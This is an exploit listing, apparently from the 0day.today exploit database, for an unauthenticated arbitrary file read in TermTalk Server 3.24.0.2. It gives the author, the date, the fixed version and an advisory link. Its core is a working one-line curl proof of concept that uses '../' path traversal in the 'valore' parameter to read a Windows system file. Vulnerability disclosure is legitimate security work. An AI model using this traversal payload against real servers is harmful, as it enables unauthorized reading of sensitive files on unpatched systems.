[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Vulnerability

Author
Fabiano Golluscio
Risk
[
Security Risk High
]
0day-ID
0day-ID-37197
Category
remote exploits
Date add
06-01-2022
Platform
windows
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/

POC

curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts

#  0day.today [2024-12-25]  #